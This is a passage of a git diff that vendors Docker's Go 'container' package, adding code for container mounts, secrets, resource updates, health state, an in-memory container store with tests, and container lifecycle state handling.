+			})
+		}
+	}
+	if container.HostnamePath != "" {
+		if _, err := os.Stat(container.HostnamePath); err != nil {
+			logrus.Warnf("HostnamePath set to %q, but can't stat this filename (err = %v); skipping", container.HostnamePath, err)
+		} else {
+			if !container.HasMountFor("/etc/hostname") {
+				label.Relabel(container.HostnamePath, container.MountLabel, shared)
+			}
+			writable := !container.HostConfig.ReadonlyRootfs
+			if m, exists := container.MountPoints["/etc/hostname"]; exists {
+				writable = m.RW
+			}
+			mounts = append(mounts, Mount{
+				Source:      container.HostnamePath,
+				Destination: "/etc/hostname",
+				Writable:    writable,
+				Propagation: string(volume.DefaultPropagationMode),
+			})
+		}
+	}
+	if container.HostsPath != "" {
+		if _, err := os.Stat(container.HostsPath); err != nil {
+			logrus.Warnf("HostsPath set to %q, but can't stat this filename (err = %v); skipping", container.HostsPath, err)
+		} else {
+			if !container.HasMountFor("/etc/hosts") {
+				label.Relabel(container.HostsPath, container.MountLabel, shared)
+			}
+			writable := !container.HostConfig.ReadonlyRootfs
+			if m, exists := container.MountPoints["/etc/hosts"]; exists {
+				writable = m.RW
+			}
+			mounts = append(mounts, Mount{
+				Source:      container.HostsPath,
+				Destination: "/etc/hosts",
+				Writable:    writable,
+				Propagation: string(volume.DefaultPropagationMode),
+			})
+		}
+	}
+	return mounts
+}
+
+// SecretMountPath returns the path of the secret mount for the container
+func (container *Container) SecretMountPath() string {
+	return filepath.Join(container.Root, "secrets")
+}
+
+// CopyImagePathContent copies files in destination to the volume.
+func (container *Container) CopyImagePathContent(v volume.Volume, destination string) error {
+	rootfs, err := symlink.FollowSymlinkInScope(filepath.Join(container.BaseFS, destination), container.BaseFS)
+	if err != nil {
+		return err
+	}
+
+	if _, err = ioutil.ReadDir(rootfs); err != nil {
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return err
+	}
+
+	id := stringid.GenerateNonCryptoID()
+	path, err := v.Mount(id)
+	if err != nil {
+		return err
+	}
+
+	defer func() {
+		if err := v.Unmount(id); err != nil {
+			logrus.Warnf("error while unmounting volume %s: %v", v.Name(), err)
+		}
+	}()
+	if err := label.Relabel(path, container.MountLabel, true); err != nil && err != unix.ENOTSUP {
+		return err
+	}
+	return copyExistingContents(rootfs, path)
+}
+
+// ShmResourcePath returns path to shm
+func (container *Container) ShmResourcePath() (string, error) {
+	return container.GetRootResourcePath("shm")
+}
+
+// HasMountFor checks if path is a mountpoint
+func (container *Container) HasMountFor(path string) bool {
+	_, exists := container.MountPoints[path]
+	return exists
+}
+
+// UnmountIpcMounts uses the provided unmount function to unmount shm and mqueue if they were mounted
+func (container *Container) UnmountIpcMounts(unmount func(pth string) error) {
+	if container.HostConfig.IpcMode.IsContainer() || container.HostConfig.IpcMode.IsHost() {
+		return
+	}
+
+	var warnings []string
+
+	if !container.HasMountFor("/dev/shm") {
+		shmPath, err := container.ShmResourcePath()
+		if err != nil {
+			logrus.Error(err)
+			warnings = append(warnings, err.Error())
+		} else if shmPath != "" {
+			if err := unmount(shmPath); err != nil && !os.IsNotExist(err) {
+				warnings = append(warnings, fmt.Sprintf("failed to umount %s: %v", shmPath, err))
+			}
+
+		}
+	}
+
+	if len(warnings) > 0 {
+		logrus.Warnf("failed to cleanup ipc mounts:\n%v", strings.Join(warnings, "\n"))
+	}
+}
+
+// IpcMounts returns the list of IPC mounts
+func (container *Container) IpcMounts() []Mount {
+	var mounts []Mount
+
+	if !container.HasMountFor("/dev/shm") {
+		label.SetFileLabel(container.ShmPath, container.MountLabel)
+		mounts = append(mounts, Mount{
+			Source:      container.ShmPath,
+			Destination: "/dev/shm",
+			Writable:    true,
+			Propagation: string(volume.DefaultPropagationMode),
+		})
+	}
+
+	return mounts
+}
+
+// SecretMount returns the mount for the secret path
+func (container *Container) SecretMount() *Mount {
+	if len(container.SecretReferences) > 0 {
+		return &Mount{
+			Source:      container.SecretMountPath(),
+			Destination: containerSecretMountPath,
+			Writable:    false,
+		}
+	}
+
+	return nil
+}
+
+// UnmountSecrets unmounts the local tmpfs for secrets
+func (container *Container) UnmountSecrets() error {
+	if _, err := os.Stat(container.SecretMountPath()); err != nil {
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return err
+	}
+
+	return detachMounted(container.SecretMountPath())
+}
+
+// UpdateContainer updates configuration of a container.
+func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error {
+	container.Lock()
+	defer container.Unlock()
+
+	// update resources of container
+	resources := hostConfig.Resources
+	cResources := &container.HostConfig.Resources
+	if resources.BlkioWeight != 0 {
+		cResources.BlkioWeight = resources.BlkioWeight
+	}
+	if resources.CPUShares != 0 {
+		cResources.CPUShares = resources.CPUShares
+	}
+	if resources.CPUPeriod != 0 {
+		cResources.CPUPeriod = resources.CPUPeriod
+	}
+	if resources.CPUQuota != 0 {
+		cResources.CPUQuota = resources.CPUQuota
+	}
+	if resources.CpusetCpus != "" {
+		cResources.CpusetCpus = resources.CpusetCpus
+	}
+	if resources.CpusetMems != "" {
+		cResources.CpusetMems = resources.CpusetMems
+	}
+	if resources.Memory != 0 {
+		// if memory limit smaller than already set memoryswap limit and doesn't
+		// update the memoryswap limit, then error out.
+		if resources.Memory > cResources.MemorySwap && resources.MemorySwap == 0 {
+			return fmt.Errorf("Memory limit should be smaller than already set memoryswap limit, update the memoryswap at the same time")
+		}
+		cResources.Memory = resources.Memory
+	}
+	if resources.MemorySwap != 0 {
+		cResources.MemorySwap = resources.MemorySwap
+	}
+	if resources.MemoryReservation != 0 {
+		cResources.MemoryReservation = resources.MemoryReservation
+	}
+	if resources.KernelMemory != 0 {
+		cResources.KernelMemory = resources.KernelMemory
+	}
+
+	// update HostConfig of container
+	if hostConfig.RestartPolicy.Name != "" {
+		if container.HostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() {
+			return fmt.Errorf("Restart policy cannot be updated because AutoRemove is enabled for the container")
+		}
+		container.HostConfig.RestartPolicy = hostConfig.RestartPolicy
+	}
+
+	if err := container.ToDisk(); err != nil {
+		logrus.Errorf("Error saving updated container: %v", err)
+		return err
+	}
+
+	return nil
+}
+
+// DetachAndUnmount uses a detached mount on all mount destinations, then
+// unmounts each volume normally.
+// This is used from daemon/archive for `docker cp`
+func (container *Container) DetachAndUnmount(volumeEventLog func(name, action string, attributes map[string]string)) error {
+	networkMounts := container.NetworkMounts()
+	mountPaths := make([]string, 0, len(container.MountPoints)+len(networkMounts))
+
+	for _, mntPoint := range container.MountPoints {
+		dest, err := container.GetResourcePath(mntPoint.Destination)
+		if err != nil {
+			logrus.Warnf("Failed to get volume destination path for container '%s' at '%s' while lazily unmounting: %v", container.ID, mntPoint.Destination, err)
+			continue
+		}
+		mountPaths = append(mountPaths, dest)
+	}
+
+	for _, m := range networkMounts {
+		dest, err := container.GetResourcePath(m.Destination)
+		if err != nil {
+			logrus.Warnf("Failed to get volume destination path for container '%s' at '%s' while lazily unmounting: %v", container.ID, m.Destination, err)
+			continue
+		}
+		mountPaths = append(mountPaths, dest)
+	}
+
+	for _, mountPath := range mountPaths {
+		if err := detachMounted(mountPath); err != nil {
+			logrus.Warnf("%s unmountVolumes: Failed to do lazy umount fo volume '%s': %v", container.ID, mountPath, err)
+		}
+	}
+	return container.UnmountVolumes(volumeEventLog)
+}
+
+// copyExistingContents copies from the source to the destination and
+// ensures the ownership is appropriately set.
+func copyExistingContents(source, destination string) error {
+	volList, err := ioutil.ReadDir(source)
+	if err != nil {
+		return err
+	}
+	if len(volList) > 0 {
+		srcList, err := ioutil.ReadDir(destination)
+		if err != nil {
+			return err
+		}
+		if len(srcList) == 0 {
+			// If the source volume is empty, copies files from the root into the volume
+			if err := chrootarchive.CopyWithTar(source, destination); err != nil {
+				return err
+			}
+		}
+	}
+	return copyOwnership(source, destination)
+}
+
+// copyOwnership copies the permissions and uid:gid of the source file
+// to the destination file
+func copyOwnership(source, destination string) error {
+	stat, err := system.Stat(source)
+	if err != nil {
+		return err
+	}
+
+	if err := os.Chown(destination, int(stat.UID()), int(stat.GID())); err != nil {
+		return err
+	}
+
+	return os.Chmod(destination, os.FileMode(stat.Mode()))
+}
+
+// TmpfsMounts returns the list of tmpfs mounts
+func (container *Container) TmpfsMounts() ([]Mount, error) {
+	var mounts []Mount
+	for dest, data := range container.HostConfig.Tmpfs {
+		mounts = append(mounts, Mount{
+			Source:      "tmpfs",
+			Destination: dest,
+			Data:        data,
+		})
+	}
+	for dest, mnt := range container.MountPoints {
+		if mnt.Type == mounttypes.TypeTmpfs {
+			data, err := volume.ConvertTmpfsOptions(mnt.Spec.TmpfsOptions, mnt.Spec.ReadOnly)
+			if err != nil {
+				return nil, err
+			}
+			mounts = append(mounts, Mount{
+				Source:      "tmpfs",
+				Destination: dest,
+				Data:        data,
+			})
+		}
+	}
+	return mounts, nil
+}
+
+// cleanResourcePath cleans a resource path and prepares to combine with mnt path
+func cleanResourcePath(path string) string {
+	return filepath.Join(string(os.PathSeparator), path)
+}
+
+// EnableServiceDiscoveryOnDefaultNetwork Enable service discovery on default network
+func (container *Container) EnableServiceDiscoveryOnDefaultNetwork() bool {
+	return false
+}
diff --git a/vendor/github.com/docker/docker/container/container_windows.go b/vendor/github.com/docker/docker/container/container_windows.go
new file mode 100644
index 0000000000..1025836f1f
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/container_windows.go
@@ -0,0 +1,111 @@
+// +build windows
+
+package container
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/utils"
+)
+
+// Container holds fields specific to the Windows implementation. See
+// CommonContainer for standard fields common to all containers.
+type Container struct {
+	CommonContainer
+
+	// Fields below here are platform specific.
+}
+
+// ExitStatus provides exit reasons for a container.
+type ExitStatus struct {
+	// The exit code with which the container exited.
+	ExitCode int
+}
+
+// CreateDaemonEnvironment creates a new environment variable slice for this container.
+func (container *Container) CreateDaemonEnvironment(_ bool, linkedEnv []string) []string {
+	// because the env on the container can override certain default values
+	// we need to replace the 'env' keys where they match and append anything
+	// else.
+	return utils.ReplaceOrAppendEnvValues(linkedEnv, container.Config.Env)
+}
+
+// UnmountIpcMounts unmounts Ipc related mounts.
+// This is a NOOP on windows.
+func (container *Container) UnmountIpcMounts(unmount func(pth string) error) {
+}
+
+// IpcMounts returns the list of Ipc related mounts.
+func (container *Container) IpcMounts() []Mount {
+	return nil
+}
+
+// SecretMount returns the mount for the secret path
+func (container *Container) SecretMount() *Mount {
+	return nil
+}
+
+// UnmountSecrets unmounts the fs for secrets
+func (container *Container) UnmountSecrets() error {
+	return nil
+}
+
+// DetachAndUnmount unmounts all volumes.
+// On Windows it only delegates to `UnmountVolumes` since there is nothing to
+// force unmount.
+func (container *Container) DetachAndUnmount(volumeEventLog func(name, action string, attributes map[string]string)) error {
+	return container.UnmountVolumes(volumeEventLog)
+}
+
+// TmpfsMounts returns the list of tmpfs mounts
+func (container *Container) TmpfsMounts() ([]Mount, error) {
+	var mounts []Mount
+	return mounts, nil
+}
+
+// UpdateContainer updates configuration of a container
+func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error {
+	container.Lock()
+	defer container.Unlock()
+	resources := hostConfig.Resources
+	if resources.BlkioWeight != 0 || resources.CPUShares != 0 ||
+		resources.CPUPeriod != 0 || resources.CPUQuota != 0 ||
+		resources.CpusetCpus != "" || resources.CpusetMems != "" ||
+		resources.Memory != 0 || resources.MemorySwap != 0 ||
+		resources.MemoryReservation != 0 || resources.KernelMemory != 0 {
+		return fmt.Errorf("Resource updating isn't supported on Windows")
+	}
+	// update HostConfig of container
+	if hostConfig.RestartPolicy.Name != "" {
+		if container.HostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() {
+			return fmt.Errorf("Restart policy cannot be updated because AutoRemove is enabled for the container")
+		}
+		container.HostConfig.RestartPolicy = hostConfig.RestartPolicy
+	}
+	return nil
+}
+
+// cleanResourcePath cleans a resource path by removing C:\ syntax, and prepares
+// to combine with a volume path
+func cleanResourcePath(path string) string {
+	if len(path) >= 2 {
+		c := path[0]
+		if path[1] == ':' && ('a' <= c && c <= 'z' || 'A' <= c && c <= 'Z') {
+			path = path[2:]
+		}
+	}
+	return filepath.Join(string(os.PathSeparator), path)
+}
+
+// BuildHostnameFile writes the container's hostname file.
+func (container *Container) BuildHostnameFile() error {
+	return nil
+}
+
+// EnableServiceDiscoveryOnDefaultNetwork Enable service discovery on default network
+func (container *Container) EnableServiceDiscoveryOnDefaultNetwork() bool {
+	return true
+}
diff --git a/vendor/github.com/docker/docker/container/health.go b/vendor/github.com/docker/docker/container/health.go
new file mode 100644
index 0000000000..6e3cd12f3b
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/health.go
@@ -0,0 +1,49 @@
+package container
+
+import (
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+)
+
+// Health holds the current container health-check state
+type Health struct {
+	types.Health
+	stop chan struct{} // Write struct{} to stop the monitor
+}
+
+// String returns a human-readable description of the health-check state
+func (s *Health) String() string {
+	// This happens when the container is being shutdown and the monitor has stopped
+	// or the monitor has yet to be setup.
+	if s.stop == nil {
+		return types.Unhealthy
+	}
+
+	switch s.Status {
+	case types.Starting:
+		return "health: starting"
+	default: // Healthy and Unhealthy are clear on their own
+		return s.Status
+	}
+}
+
+// OpenMonitorChannel creates and returns a new monitor channel. If there already is one,
+// it returns nil.
+func (s *Health) OpenMonitorChannel() chan struct{} {
+	if s.stop == nil {
+		logrus.Debug("OpenMonitorChannel")
+		s.stop = make(chan struct{})
+		return s.stop
+	}
+	return nil
+}
+
+// CloseMonitorChannel closes any existing monitor channel.
+func (s *Health) CloseMonitorChannel() {
+	if s.stop != nil {
+		logrus.Debug("CloseMonitorChannel: waiting for probe to stop")
+		close(s.stop)
+		s.stop = nil
+		logrus.Debug("CloseMonitorChannel done")
+	}
+}
diff --git a/vendor/github.com/docker/docker/container/history.go b/vendor/github.com/docker/docker/container/history.go
new file mode 100644
index 0000000000..c80c2aa0cc
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/history.go
@@ -0,0 +1,30 @@
+package container
+
+import "sort"
+
+// History is a convenience type for storing a list of containers,
+// sorted by creation date in descendant order.
+type History []*Container
+
+// Len returns the number of containers in the history.
+func (history *History) Len() int {
+	return len(*history)
+}
+
+// Less compares two containers and returns true if the second one
+// was created before the first one.
+func (history *History) Less(i, j int) bool {
+	containers := *history
+	return containers[j].Created.Before(containers[i].Created)
+}
+
+// Swap switches containers i and j positions in the history.
+func (history *History) Swap(i, j int) {
+	containers := *history
+	containers[i], containers[j] = containers[j], containers[i]
+}
+
+// sort orders the history by creation date in descendant order.
+func (history *History) sort() {
+	sort.Sort(history)
+}
diff --git a/vendor/github.com/docker/docker/container/memory_store.go b/vendor/github.com/docker/docker/container/memory_store.go
new file mode 100644
index 0000000000..706407a71c
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/memory_store.go
@@ -0,0 +1,95 @@
+package container
+
+import (
+	"sync"
+)
+
+// memoryStore implements a Store in memory.
+type memoryStore struct {
+	s map[string]*Container
+	sync.RWMutex
+}
+
+// NewMemoryStore initializes a new memory store.
+func NewMemoryStore() Store {
+	return &memoryStore{
+		s: make(map[string]*Container),
+	}
+}
+
+// Add appends a new container to the memory store.
+// It overrides the id if it existed before.
+func (c *memoryStore) Add(id string, cont *Container) {
+	c.Lock()
+	c.s[id] = cont
+	c.Unlock()
+}
+
+// Get returns a container from the store by id.
+func (c *memoryStore) Get(id string) *Container {
+	var res *Container
+	c.RLock()
+	res = c.s[id]
+	c.RUnlock()
+	return res
+}
+
+// Delete removes a container from the store by id.
+func (c *memoryStore) Delete(id string) {
+	c.Lock()
+	delete(c.s, id)
+	c.Unlock()
+}
+
+// List returns a sorted list of containers from the store.
+// The containers are ordered by creation date.
+func (c *memoryStore) List() []*Container {
+	containers := History(c.all())
+	containers.sort()
+	return containers
+}
+
+// Size returns the number of containers in the store.
+func (c *memoryStore) Size() int {
+	c.RLock()
+	defer c.RUnlock()
+	return len(c.s)
+}
+
+// First returns the first container found in the store by a given filter.
+func (c *memoryStore) First(filter StoreFilter) *Container {
+	for _, cont := range c.all() {
+		if filter(cont) {
+			return cont
+		}
+	}
+	return nil
+}
+
+// ApplyAll calls the reducer function with every container in the store.
+// This operation is asynchronous in the memory store.
+// NOTE: Modifications to the store MUST NOT be done by the StoreReducer.
+func (c *memoryStore) ApplyAll(apply StoreReducer) {
+	wg := new(sync.WaitGroup)
+	for _, cont := range c.all() {
+		wg.Add(1)
+		go func(container *Container) {
+			apply(container)
+			wg.Done()
+		}(cont)
+	}
+
+	wg.Wait()
+}
+
+func (c *memoryStore) all() []*Container {
+	c.RLock()
+	containers := make([]*Container, 0, len(c.s))
+	for _, cont := range c.s {
+		containers = append(containers, cont)
+	}
+	c.RUnlock()
+	return containers
+}
+
+var _ Store = &memoryStore{}
diff --git a/vendor/github.com/docker/docker/container/memory_store_test.go b/vendor/github.com/docker/docker/container/memory_store_test.go
new file mode 100644
index 0000000000..f81738fae1
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/memory_store_test.go
@@ -0,0 +1,106 @@
+package container
+
+import (
+	"testing"
+	"time"
+)
+
+func TestNewMemoryStore(t *testing.T) {
+	s := NewMemoryStore()
+	m, ok := s.(*memoryStore)
+	if !ok {
+		t.Fatalf("store is not a memory store %v", s)
+	}
+	if m.s == nil {
+		t.Fatal("expected store map to not be nil")
+	}
+}
+
+func TestAddContainers(t *testing.T) {
+	s := NewMemoryStore()
+	s.Add("id", NewBaseContainer("id", "root"))
+	if s.Size() != 1 {
+		t.Fatalf("expected store size 1, got %v", s.Size())
+	}
+}
+
+func TestGetContainer(t *testing.T) {
+	s := NewMemoryStore()
+	s.Add("id", NewBaseContainer("id", "root"))
+	c := s.Get("id")
+	if c == nil {
+		t.Fatal("expected container to not be nil")
+	}
+}
+
+func TestDeleteContainer(t *testing.T) {
+	s := NewMemoryStore()
+	s.Add("id", NewBaseContainer("id", "root"))
+	s.Delete("id")
+	if c := s.Get("id"); c != nil {
+		t.Fatalf("expected container to be nil after removal, got %v", c)
+	}
+
+	if s.Size() != 0 {
+		t.Fatalf("expected store size to be 0, got %v", s.Size())
+	}
+}
+
+func TestListContainers(t *testing.T) {
+	s := NewMemoryStore()
+
+	cont := NewBaseContainer("id", "root")
+	cont.Created = time.Now()
+	cont2 := NewBaseContainer("id2", "root")
+	cont2.Created = time.Now().Add(24 * time.Hour)
+
+	s.Add("id", cont)
+	s.Add("id2", cont2)
+
+	list := s.List()
+	if len(list) != 2 {
+		t.Fatalf("expected list size 2, got %v", len(list))
+	}
+	if list[0].ID != "id2" {
+		t.Fatalf("expected older container to be first, got %v", list[0].ID)
+	}
+}
+
+func TestFirstContainer(t *testing.T) {
+	s := NewMemoryStore()
+
+	s.Add("id", NewBaseContainer("id", "root"))
+	s.Add("id2", NewBaseContainer("id2", "root"))
+
+	first := s.First(func(cont *Container) bool {
+		return cont.ID == "id2"
+	})
+
+	if first == nil {
+		t.Fatal("expected container to not be nil")
+	}
+	if first.ID != "id2" {
+		t.Fatalf("expected id2, got %v", first)
+	}
+}
+
+func TestApplyAllContainer(t *testing.T) {
+	s := NewMemoryStore()
+
+	s.Add("id", NewBaseContainer("id", "root"))
+	s.Add("id2", NewBaseContainer("id2", "root"))
+
+	s.ApplyAll(func(cont *Container) {
+		if cont.ID == "id2" {
+			cont.ID = "newID"
+		}
+	})
+
+	cont := s.Get("id2")
+	if cont == nil {
+		t.Fatal("expected container to not be nil")
+	}
+	if cont.ID != "newID" {
+		t.Fatalf("expected newID, got %v", cont)
+	}
+}
diff --git a/vendor/github.com/docker/docker/container/monitor.go b/vendor/github.com/docker/docker/container/monitor.go
new file mode 100644
index 0000000000..f05e72b25f
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/monitor.go
@@ -0,0 +1,46 @@
+package container
+
+import (
+	"time"
+
+	"github.com/Sirupsen/logrus"
+)
+
+const (
+	loggerCloseTimeout = 10 * time.Second
+)
+
+// Reset puts a container into a state where it can be restarted again.
+func (container *Container) Reset(lock bool) {
+	if lock {
+		container.Lock()
+		defer container.Unlock()
+	}
+
+	if err := container.CloseStreams(); err != nil {
+		logrus.Errorf("%s: %s", container.ID, err)
+	}
+
+	// Re-create a brand new stdin pipe once the container exited
+	if container.Config.OpenStdin {
+		container.StreamConfig.NewInputPipes()
+	}
+
+	if container.LogDriver != nil {
+		if container.LogCopier != nil {
+			exit := make(chan struct{})
+			go func() {
+				container.LogCopier.Wait()
+				close(exit)
+			}()
+			select {
+			case <-time.After(loggerCloseTimeout):
+				logrus.Warn("Logger didn't exit in time: logs may be truncated")
+			case <-exit:
+			}
+		}
+		container.LogDriver.Close()
+		container.LogCopier = nil
+		container.LogDriver = nil
+	}
+}
diff --git a/vendor/github.com/docker/docker/container/mounts_unix.go b/vendor/github.com/docker/docker/container/mounts_unix.go
new file mode 100644
index 0000000000..c52abed2dc
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/mounts_unix.go
@@ -0,0 +1,12 @@
+// +build !windows
+
+package container
+
+// Mount contains information for a mount operation.
+type Mount struct {
+	Source      string `json:"source"`
+	Destination string `json:"destination"`
+	Writable    bool   `json:"writable"`
+	Data        string `json:"data"`
+	Propagation string `json:"mountpropagation"`
+}
diff --git a/vendor/github.com/docker/docker/container/mounts_windows.go b/vendor/github.com/docker/docker/container/mounts_windows.go
new file mode 100644
index 0000000000..01b327f788
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/mounts_windows.go
@@ -0,0 +1,8 @@
+package container
+
+// Mount contains information for a mount operation.
+type Mount struct {
+	Source      string `json:"source"`
+	Destination string `json:"destination"`
+	Writable    bool   `json:"writable"`
+}
diff --git a/vendor/github.com/docker/docker/container/state.go b/vendor/github.com/docker/docker/container/state.go
new file mode 100644
index 0000000000..4dd2ecec69
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/state.go
@@ -0,0 +1,343 @@
+package container
+
+import (
+	"fmt"
+	"sync"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/go-units"
+)
+
+// State holds the current container state, and has methods to get and
+// set the state. Container has an embed, which allows all of the
+// functions defined against State to run against Container.
+type State struct {
+	sync.Mutex
+	// FIXME: Why do we have both paused and running if a
+	// container cannot be paused and running at the same time?
+	Running           bool
+	Paused            bool
+	Restarting        bool
+	OOMKilled         bool
+	RemovalInProgress bool // Not need for this to be persistent on disk.
+	Dead              bool
+	Pid               int
+	ExitCodeValue     int    `json:"ExitCode"`
+	ErrorMsg          string `json:"Error"` // contains last known error when starting the container
+	StartedAt         time.Time
+	FinishedAt        time.Time
+	waitChan          chan struct{}
+	Health            *Health
+}
+
+// StateStatus is used to return an error type implementing both
+// exec.ExitCode and error.
+// This type is needed as State include a sync.Mutex field which make
+// copying it unsafe.
+type StateStatus struct {
+	exitCode int
+	error    string
+}
+
+func newStateStatus(ec int, err string) *StateStatus {
+	return &StateStatus{
+		exitCode: ec,
+		error:    err,
+	}
+}
+
+// ExitCode returns current exitcode for the state.
+func (ss *StateStatus) ExitCode() int {
+	return ss.exitCode
+}
+
+// Error returns current error for the state.
+func (ss *StateStatus) Error() string {
+	return ss.error
+}
+
+// NewState creates a default state object with a fresh channel for state changes.
+func NewState() *State {
+	return &State{
+		waitChan: make(chan struct{}),
+	}
+}
+
+// String returns a human-readable description of the state
+func (s *State) String() string {
+	if s.Running {
+		if s.Paused {
+			return fmt.Sprintf("Up %s (Paused)", units.HumanDuration(time.Now().UTC().Sub(s.StartedAt)))
+		}
+		if s.Restarting {
+			return fmt.Sprintf("Restarting (%d) %s ago", s.ExitCodeValue, units.HumanDuration(time.Now().UTC().Sub(s.FinishedAt)))
+		}
+
+		if h := s.Health; h != nil {
+			return fmt.Sprintf("Up %s (%s)", units.HumanDuration(time.Now().UTC().Sub(s.StartedAt)), h.String())
+		}
+
+		return fmt.Sprintf("Up %s", units.HumanDuration(time.Now().UTC().Sub(s.StartedAt)))
+	}
+
+	if s.RemovalInProgress {
+		return "Removal In Progress"
+	}
+
+	if s.Dead {
+		return "Dead"
+	}
+
+	if s.StartedAt.IsZero() {
+		return "Created"
+	}
+
+	if s.FinishedAt.IsZero() {
+		return ""
+	}
+
+	return fmt.Sprintf("Exited (%d) %s ago", s.ExitCodeValue, units.HumanDuration(time.Now().UTC().Sub(s.FinishedAt)))
+}
+
+// HealthString returns a single string to describe health status.
+func (s *State) HealthString() string {
+	if s.Health == nil {
+		return types.NoHealthcheck
+	}
+
+	return s.Health.String()
+}
+
+// IsValidHealthString checks if the provided string is a valid container health status or not.
+func IsValidHealthString(s string) bool {
+	return s == types.Starting ||
+		s == types.Healthy ||
+		s == types.Unhealthy ||
+		s == types.NoHealthcheck
+}
+
+// StateString returns a single string to describe state
+func (s *State) StateString() string {
+	if s.Running {
+		if s.Paused {
+			return "paused"
+		}
+		if s.Restarting {
+			return "restarting"
+		}
+		return "running"
+	}
+
+	if s.RemovalInProgress {
+		return "removing"
+	}
+
+	if s.Dead {
+		return "dead"
+	}
+
+	if s.StartedAt.IsZero() {
+		return "created"
+	}
+
+	return "exited"
+}
+
+// IsValidStateString checks if the provided string is a valid container state or not.
+func IsValidStateString(s string) bool {
+	if s != "paused" &&
+		s != "restarting" &&
+		s != "removing" &&
+		s != "running" &&
+		s != "dead" &&
+		s != "created" &&
+		s != "exited" {
+		return false
+	}
+	return true
+}
+
+func wait(waitChan <-chan struct{}, timeout time.Duration) error {
+	if timeout < 0 {
+		<-waitChan
+		return nil
+	}
+	select {
+	case <-time.After(timeout):
+		return fmt.Errorf("Timed out: %v", timeout)
+	case <-waitChan:
+		return nil
+	}
+}
+
+// WaitStop waits until state is stopped. If state already stopped it returns
+// immediately. If you want wait forever you must supply negative timeout.
+// Returns exit code, that was passed to SetStopped
+func (s *State) WaitStop(timeout time.Duration) (int, error) {
+	s.Lock()
+	if !s.Running {
+		exitCode := s.ExitCodeValue
+		s.Unlock()
+		return exitCode, nil
+	}
+	waitChan := s.waitChan
+	s.Unlock()
+	if err := wait(waitChan, timeout); err != nil {
+		return -1, err
+	}
+	s.Lock()
+	defer s.Unlock()
+	return s.ExitCode(), nil
+}
+
+// WaitWithContext waits for the container to stop. Optional context can be
+// passed for canceling the request.
+func (s *State) WaitWithContext(ctx context.Context) error {
+	// todo(tonistiigi): make other wait functions use this
+	s.Lock()
+	if !s.Running {
+		state := newStateStatus(s.ExitCode(), s.Error())
+		defer s.Unlock()
+		if state.ExitCode() == 0 {
+			return nil
+		}
+		return state
+	}
+	waitChan := s.waitChan
+	s.Unlock()
+	select {
+	case <-waitChan:
+		s.Lock()
+		state := newStateStatus(s.ExitCode(), s.Error())
+		s.Unlock()
+		if state.ExitCode() == 0 {
+			return nil
+		}
+		return state
+	case <-ctx.Done():
+		return ctx.Err()
+	}
+}
+
+// IsRunning returns whether the running flag is set. Used by Container to check whether a container is running.
+func (s *State) IsRunning() bool {
+	s.Lock()
+	res := s.Running
+	s.Unlock()
+	return res
+}
+
+// GetPID holds the process id of a container.
+func (s *State) GetPID() int {
+	s.Lock()
+	res := s.Pid
+	s.Unlock()
+	return res
+}
+
+// ExitCode returns current exitcode for the state. Take lock before if state
+// may be shared.
+func (s *State) ExitCode() int {
+	return s.ExitCodeValue
+}
+
+// SetExitCode sets current exitcode for the state. Take lock before if state
+// may be shared.
+func (s *State) SetExitCode(ec int) {
+	s.ExitCodeValue = ec
+}
+
+// SetRunning sets the state of the container to "running".
+func (s *State) SetRunning(pid int, initial bool) {
+	s.ErrorMsg = ""
+	s.Running = true
+	s.Restarting = false
+	s.ExitCodeValue = 0
+	s.Pid = pid
+	if initial {
+		s.StartedAt = time.Now().UTC()
+	}
+}
+
+// SetStopped sets the container state to "stopped" without locking.
+func (s *State) SetStopped(exitStatus *ExitStatus) {
+	s.Running = false
+	s.Paused = false
+	s.Restarting = false
+	s.Pid = 0
+	s.FinishedAt = time.Now().UTC()
+	s.setFromExitStatus(exitStatus)
+	close(s.waitChan) // fire waiters for stop
+	s.waitChan = make(chan struct{})
+}
+
+// SetRestarting sets the container state to "restarting" without locking.
+// It also sets the container PID to 0.
+func (s *State) SetRestarting(exitStatus *ExitStatus) {
+	// we should consider the container running when it is restarting because of
+	// all the checks in docker around rm/stop/etc
+	s.Running = true
+	s.Restarting = true
+	s.Pid = 0
+	s.FinishedAt = time.Now().UTC()
+	s.setFromExitStatus(exitStatus)
+	close(s.waitChan) // fire waiters for stop
+	s.waitChan = make(chan struct{})
+}
+
+// SetError sets the container's error state. This is useful when we want to
+// know the error that occurred when container transits to another state
+// when inspecting it
+func (s *State) SetError(err error) {
+	s.ErrorMsg = err.Error()
+}
+
+// IsPaused returns whether the container is paused or not.
+func (s *State) IsPaused() bool {
+	s.Lock()
+	res := s.Paused
+	s.Unlock()
+	return res
+}
+
+// IsRestarting returns whether the container is restarting or not.
+func (s *State) IsRestarting() bool {
+	s.Lock()
+	res := s.Restarting
+	s.Unlock()
+	return res
+}
+
+// SetRemovalInProgress sets the container state as being removed.
+// It returns true if the container was already in that state.
+func (s *State) SetRemovalInProgress() bool {
+	s.Lock()
+	defer s.Unlock()
+	if s.RemovalInProgress {
+		return true
+	}
+	s.RemovalInProgress = true
+	return false
+}
+
+// ResetRemovalInProgress makes the RemovalInProgress state to false.
+func (s *State) ResetRemovalInProgress() {
+	s.Lock()
+	s.RemovalInProgress = false
+	s.Unlock()
+}
+
+// SetDead sets the container state to "dead"
+func (s *State) SetDead() {
+	s.Lock()
+	s.Dead = true
+	s.Unlock()
+}
+
+// Error returns current error for the state.
+func (s *State) Error() string {
+	return s.ErrorMsg
+}
